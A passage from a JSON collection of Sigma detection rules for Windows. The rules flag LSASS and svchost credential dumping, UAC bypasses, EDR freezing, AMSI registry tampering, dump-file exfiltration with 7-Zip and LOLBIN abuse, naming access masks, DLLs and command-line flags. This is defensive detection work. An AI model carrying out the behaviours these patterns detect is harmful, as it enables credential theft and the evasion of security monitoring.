    "content": "title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs\nid: 9f5c1d59-33be-4e60-bcab-85d2f566effd\nrelated:\n    - id: 416bc4a2-7217-4519-8dc7-c3271817f1d5\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious process access to LSASS.exe from processes located in uncommon locations with dbgcore.dll or dbghelp.dll in the call trace.\n    These DLLs contain functions like MiniDumpWriteDump that can be abused for credential dumping purposes. While modern tools like Mimikatz have moved to using ntdll.dll,\n    dbgcore.dll and dbghelp.dll are still used by basic credential dumping utilities and legacy tools for LSASS memory access and process suspension techniques.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\n    - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_lsass_calltrace:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains:\n            - 'dbgcore.dll'\n            - 'dbghelp.dll'\n    # The following selection is commented out and not enabled by default because any access to LSASS with dbgcore.dll or dbghelp.dll in the call trace from uncommon locations is assumed to be suspicious,\n    # but it may reduce false positives if the rule is too noisy. These GrantedAccess bits are commonly used for dumping LSASS memory.\n    # Uncomment if you observe false positives with the default rule.\n    # selection_granted_access:\n    #     GrantedAccess|contains:\n    #         - '0x1fffff'\n    #         - '0x10'\n    #         - '0x1010'\n    #         - '0x1410'\n    #         - '0x1438'\n    selection_susp_location:\n        SourceImage|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Desktop\\'\n            - '\\Documents\\'\n            - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Possibly during software installation or update processes\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml",
    "content": "title: Potential Direct Syscall of NtOpenProcess\nid: 3f3f3506-1895-401b-9cc3-e86b16e630d0\nstatus: test\ndescription: Detects potential calls to NtOpenProcess directly from NTDLL.\nreferences:\n    - https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6\nauthor: Christian Burkard (Nextron Systems), Tim Shelton (FP)\ndate: 2021-07-28\nmodified: 2023-12-13\ntags:\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        CallTrace|startswith: 'UNKNOWN'\n    filter_main_vcredist:\n        TargetImage|endswith: 'vcredist_x64.exe'\n        SourceImage|endswith: 'vcredist_x64.exe'\n    filter_main_generic:\n        # Examples include \"systeminfo\", \"backgroundTaskHost\", \"AUDIODG\"\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n        TargetImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n    filter_main_kerneltrace_edge:\n        # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider\n        Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls'\n    filter_optional_vmware:\n        TargetImage|endswith: ':\\Windows\\system32\\systeminfo.exe'\n        SourceImage|endswith: 'setup64.exe' # vmware\n    filter_optional_cylance:\n        SourceImage|endswith: ':\\Windows\\Explorer.EXE'\n        TargetImage|endswith: ':\\Program Files\\Cylance\\Desktop\\CylanceUI.exe'\n    filter_optional_amazon:\n        SourceImage|endswith: 'AmazonSSMAgentSetup.exe'\n        TargetImage|endswith: 'AmazonSSMAgentSetup.exe'\n    filter_optional_vscode: # VsCode\n        SourceImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n    filter_optional_teams: # MS Teams\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n    filter_optional_discord: # Discord\n        TargetImage|contains: '\\AppData\\Local\\Discord\\'\n        TargetImage|endswith: '\\Discord.exe'\n    filter_optional_yammer:\n        SourceImage|contains: '\\AppData\\Local\\yammerdesktop\\app-'\n        SourceImage|endswith: '\\Yammer.exe'\n        TargetImage|contains: '\\AppData\\Local\\yammerdesktop\\app-'\n        TargetImage|endswith: '\\Yammer.exe'\n        GrantedAccess: '0x1000'\n    filter_optional_evernote:\n        TargetImage|endswith: '\\Evernote\\Evernote.exe'\n    filter_optional_adobe_acrobat:\n        SourceImage|contains: ':\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\'\n        SourceImage|endswith: '\\AcroCEF.exe'\n        TargetImage|contains: ':\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\'\n        TargetImage|endswith: '\\AcroCEF.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml",
    "content": "title: Credential Dumping Attempt Via Svchost\nid: 174afcfa-6e40-4ae9-af64-496546389294\nstatus: test\ndescription: Detects when a process tries to access the memory of svchost to potentially dump credentials.\nreferences:\n    - Internal Research\nauthor: Florent Labouyrie\ndate: 2021-04-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    selection:\n        TargetImage|endswith: '\\svchost.exe'\n        GrantedAccess: '0x143a'\n    filter_main_known_processes:\n        SourceImage|endswith:\n            - '\\services.exe'\n            - '\\msiexec.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml",
    "content": "title: Suspicious Svchost Process Access\nid: 166e9c50-8cd9-44af-815d-d1f0c0e90dde\nstatus: test\ndescription: Detects suspicious access to the \"svchost\" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.\nreferences:\n    - https://github.com/hlldz/Invoke-Phant0m\n    - https://twitter.com/timbmsft/status/900724491076214784\nauthor: Tim Burrell\ndate: 2020-01-02\nmodified: 2023-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: ':\\Windows\\System32\\svchost.exe'\n        GrantedAccess: '0x1F3FFF'\n        CallTrace|contains: 'UNKNOWN'\n    filter_main_msbuild:\n        SourceImage|contains: ':\\Program Files\\Microsoft Visual Studio\\'\n        SourceImage|endswith: '\\MSBuild\\Current\\Bin\\MSBuild.exe'\n        # Just to make sure it's \"really\" .NET :)\n        CallTrace|contains:\n            - 'Microsoft.Build.ni.dll'\n            - 'System.ni.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml",
    "content": "title: Function Call From Undocumented COM Interface EditionUpgradeManager\nid: fb3722e4-1a06-46b6-b772-253e2e7db933\nstatus: test\ndescription: Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.\nreferences:\n    - https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/\n    - https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611\nauthor: oscd.community, Dmitry Uchakin\ndate: 2020-10-07\nmodified: 2023-11-30\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        CallTrace|contains: 'editionupgrademanagerobj.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml",
    "content": "title: UAC Bypass Using WOW64 Logger DLL Hijack\nid: 4f6c43e2-f989-4ea5-bcd8-843b49a0317c\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        SourceImage|contains: ':\\Windows\\SysWOW64\\'\n        GrantedAccess: '0x1fffff'\n        CallTrace|startswith: 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access.yml",
    "content": "title: Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze\nid: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\nrelated:\n    - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\n      type: similar\n    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects process access events where WerFaultSecure accesses MsMpEng.exe with dbgcore.dll or dbghelp.dll in the call trace, indicating potential EDR freeze techniques.\n    This technique leverages WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to call MiniDumpWriteDump and suspend EDR/AV processes, allowing malicious activity to execute undetected during the suspension period.\nreferences:\n    - https://blog.axelarator.net/hunting-for-edr-freeze/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_access\n    product: windows\n    definition: |\n        Requires Sysmon Event ID 10 (ProcessAccess) with CallTrace enabled.\n        Example sysmon config snippet with grouping, as logging individual ProcessAccess events can generate excessive logs:\n        <ProcessAccess onmatch=\"include\">\n            <Rule groupRelation=\"and\">\n            <TargetImage condition=\"end with\">\\MsMpEng.exe</TargetImage>\n            <SourceImage condition=\"end with\">\\WerFaultSecure.exe</SourceImage>\n            </Rule>\n        </ProcessAccess>\ndetection:\n    selection:\n        SourceImage|endswith: '\\WerFaultSecure.exe'\n        TargetImage|endswith: '\\MsMpEng.exe'\n        CallTrace|contains:\n            - '\\dbgcore.dll'\n            - '\\dbghelp.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate Windows Error Reporting operations\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml",
    "content": "title: 7Zip Compressing Dump Files\nid: ec570e53-4c76-45a9-804d-dc3f355ff7a7\nrelated:\n    - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc\n      type: derived\nstatus: test\ndescription: Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\nmodified: 2023-09-12\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Description|contains: '7-Zip'\n        - Image|endswith:\n              - '\\7z.exe'\n              - '\\7zr.exe'\n              - '\\7za.exe'\n        - OriginalFileName:\n              - '7z.exe'\n              - '7za.exe'\n    selection_extension:\n        CommandLine|contains:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of 7z with a command line in which \".dmp\" or \".dump\" appears accidentally\n    - Legitimate use of 7z to compress WER \".dmp\" files for troubleshooting\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml",
    "content": "title: Compress Data and Lock With Password for Exfiltration With 7-ZIP\nid: 9fbf5927-5261-4284-a71d-f681029ea574\nstatus: test\ndescription: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: frack113\ndate: 2021-07-27\nmodified: 2023-03-13\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Description|contains: '7-Zip'\n        - Image|endswith:\n              - '\\7z.exe'\n              - '\\7zr.exe'\n              - '\\7za.exe'\n        - OriginalFileName:\n              - '7z.exe'\n              - '7za.exe'\n    selection_password:\n        CommandLine|contains: ' -p'\n    selection_action:\n        CommandLine|contains:\n            - ' a '\n            - ' u '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activity is expected since compressing files with a password is common.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml",
    "content": "title: Potential DLL Injection Via AccCheckConsole\nid: 0f6da907-5854-4be6-859a-e9958747b0aa\nstatus: test\ndescription: |\n    Detects the execution \"AccCheckConsole\" a command-line tool for verifying the accessibility implementation of an application's UI.\n    One of the tests that this checker can run are called \"verification routine\", which tests for things like Consistency, Navigation, etc.\n    The tool allows a user to provide a DLL that can contain a custom \"verification routine\". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the \"AccCheckConsole\" utility.\nreferences:\n    - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340\n    - https://twitter.com/bohops/status/1477717351017680899?s=12\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-06\nmodified: 2024-08-29\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AccCheckConsole.exe'\n        - OriginalFileName: 'AccCheckConsole.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -hwnd'\n            - ' -process '\n            - ' -window '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the UI Accessibility Checker\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml",
    "content": "title: Suspicious AddinUtil.EXE CommandLine Execution\nid: 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8\nstatus: test\ndescription: |\n    Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\addinutil.exe'\n        - OriginalFileName: 'AddInUtil.exe'\n    selection_susp_1_flags:\n        CommandLine|contains:\n            - '-AddInRoot:'\n            - '-PipelineRoot:'\n    selection_susp_1_paths:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    selection_susp_2:\n        CommandLine|contains:\n            - '-AddInRoot:.'\n            - '-AddInRoot:\".\"'\n            - '-PipelineRoot:.'\n            - '-PipelineRoot:\".\"'\n        CurrentDirectory|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    condition: selection_img and (all of selection_susp_1_* or selection_susp_2)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of AddinUtil.EXE\nid: b5746143-59d6-4603-8d06-acbd60e166ee\nstatus: test\ndescription: |\n    Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\addinutil.exe'\n    filter_main_werfault:\n        Image|endswith:\n            - ':\\Windows\\System32\\conhost.exe'\n            - ':\\Windows\\System32\\werfault.exe'\n            - ':\\Windows\\SysWOW64\\werfault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml",
    "content": "title: Uncommon AddinUtil.EXE CommandLine Execution\nid: 4f2cd9b6-4a17-440f-bb2a-687abb65993a\nstatus: test\ndescription: |\n    Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\addinutil.exe'\n        - OriginalFileName: 'AddInUtil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '-AddInRoot:'\n            - '-PipelineRoot:'\n    filter_main_addinroot:\n        CommandLine|contains:\n            - '-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n            - '-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n            - '-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n            - '-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml",
    "content": "title: AddinUtil.EXE Execution From Uncommon Directory\nid: 6120ac2a-a34b-42c0-a9bd-1fb9f459f348\nstatus: test\ndescription: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\addinutil.exe'\n        - OriginalFileName: 'AddInUtil.exe'\n    filter_main_legit_location:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - ':\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml",
    "content": "title: Potential Adplus.EXE Abuse\nid: 2f869d59-7f6a-4931-992c-cce556ff2d53\nstatus: test\ndescription: Detects execution of \"AdPlus.exe\", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/\n    - https://twitter.com/nas_bench/status/1534916659676422152\n    - https://twitter.com/nas_bench/status/1534915321856917506\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-09\nmodified: 2023-06-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\adplus.exe'\n        - OriginalFileName: 'Adplus.exe'\n    selection_cli:\n        CommandLine|contains:\n            # Dump process memory\n            - ' -hang '\n            - ' -pn '\n            - ' -pmn '\n            - ' -p '\n            - ' -po '\n            # Using a config file\n            - ' -c '\n            # Execute commands inline\n            - ' -sc '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of Adplus for debugging purposes\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml",
    "content": "title: AgentExecutor PowerShell Execution\nid: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61\nrelated:\n    - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab\n      type: similar\nstatus: test\ndescription: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument\nauthor: Nasreddine Bencherchali (Nextron Systems), memory-shards\nreferences:\n    - https://twitter.com/lefterispan/status/1286259016436514816\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/\n    - https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\n    - https://twitter.com/jseerden/status/1247985304667066373/photo/1\ndate: 2022-12-24\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image: '\\AgentExecutor.exe'\n        - OriginalFileName: 'AgentExecutor.exe'\n    selection_cli:\n        # Example:\n        #   AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64]\n        # Note:\n        #   - If [timeoutSeconds] is NULL then it defaults to 60000\n        #   - If [enforceSignatureCheck] is:\n        #       - \"NULL\" or \"1\" then a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy allsigned -file \"\n        #       - Else a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy bypass -file \"\n        #   - [powershellPath] is always concatendated to \"powershell.exe\"\n        CommandLine|contains:\n            - ' -powershell' # Also covers the \"-powershellDetection\" flag\n            - ' -remediationScript'\n    filter_main_intune:\n        ParentImage|endswith: '\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml",
    "content": "title: Suspicious AgentExecutor PowerShell Execution\nid: c0b40568-b1e9-4b03-8d6c-b096da6da9ab\nrelated:\n    - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61\n      type: similar\nstatus: test\ndescription: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument\nauthor: Nasreddine Bencherchali (Nextron Systems), memory-shards\nreferences:\n    - https://twitter.com/lefterispan/status/1286259016436514816\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/\n    - https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\n    - https://twitter.com/jseerden/status/1247985304667066373/photo/1\ndate: 2022-12-24\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AgentExecutor.exe'\n        - OriginalFileName: 'AgentExecutor.exe'\n    selection_cli:\n        # Example:\n        #   AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64]\n        # Note:\n        #   - If [timeoutSeconds] is NULL then it defaults to 60000\n        #   - If [enforceSignatureCheck] is:\n        #       - \"NULL\" or \"1\" then a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy allsigned -file \"\n        #       - Else a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy bypass -file \"\n        #   - [powershellPath] is always concatendated to \"powershell.exe\"\n        CommandLine|contains:\n            - ' -powershell' # Also covers the \"-powershellDetection\" flag\n            - ' -remediationScript'\n    filter_main_pwsh:\n        CommandLine|contains:\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\'\n    filter_main_intune:\n        ParentImage|endswith: '\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_amsi_registry_tampering.yml",
    "content": "title: Windows AMSI Related Registry Tampering Via CommandLine\nid: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981\nrelated:\n    - id: aa37cbb0-da36-42cb-a90f-fdf216fc7467 # AMSI Disabled via Registry Modification\n      type: similar\nstatus: experimental\ndescription: |\n    Detects tampering of AMSI (Anti-Malware Scan Interface) related registry values via command line tools such as reg.exe or PowerShell.\n    AMSI provides a generic interface for applications and services to integrate with antimalware products.\n    Adversaries may disable AMSI to evade detection of malicious scripts and code execution.\nreferences:\n    - https://github.com/arttoolkit/arttoolkit.github.io/blob/16d6230d009e58fd6f773f5317fd4d14c1f26004/_wadcoms/AMSI-Bypass-Jscript_amsienable.md\n    - https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d\n    - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1562.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_key:\n        CommandLine|contains|all:\n            - '\\Software\\Microsoft\\Windows Script\\Settings'\n            - 'AmsiEnable'\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_cmd:\n        CommandLine|contains: 'add'\n    selection_powershell_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_powershell_cmd:\n        CommandLine|contains:\n            - 'Set-ItemProperty'\n            - 'New-ItemProperty'\n            - 'sp '\n    condition: selection_key and (all of selection_powershell_* or all of selection_reg_*)\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: AMSI Bypass - Create AMSIEnable Reg Key\n      technique: T1562.001\n      atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of Appvlp.EXE\nid: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43\nstatus: test\ndescription: |\n    Detects uncommon child processes of Appvlp.EXE\n    Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse \"AppVLP\" to execute shell commands.\n    Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder\n    or to mark a file as a system file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\nauthor: Sreeman\ndate: 2020-03-13\nmodified: 2023-11-09\ntags:\n    - attack.t1218\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\appvlp.exe'\n    # Note: Filters based on data from EchoTrail: https://www.echotrail.io/insights/search/appvlp.exe/\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\SysWOW64\\rundll32.exe'\n            - ':\\Windows\\System32\\rundll32.exe'\n    filter_optional_office_msoasb:\n        Image|contains: ':\\Program Files\\Microsoft Office'\n        Image|endswith: '\\msoasb.exe'\n   